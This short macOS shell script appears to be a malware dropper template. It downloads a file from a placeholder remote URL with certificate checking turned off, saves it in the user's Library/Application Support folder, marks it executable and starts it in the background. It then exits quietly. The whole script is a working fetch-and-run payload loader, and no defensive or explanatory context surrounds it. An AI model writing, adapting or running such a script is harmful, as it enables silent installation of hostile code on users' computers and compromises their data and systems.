#!/bin/sh
curl -k 'REMOTE_PAYLOAD_URL' -o /Users/$USER/Library/Application\ Support/PAYLOAD_NAME
chmod +x /Users/$USER/Library/Application\ Support/PAYLOAD_NAME
/Users/$USER/Library/Application\ Support/PAYLOAD_NAME &
exit 0
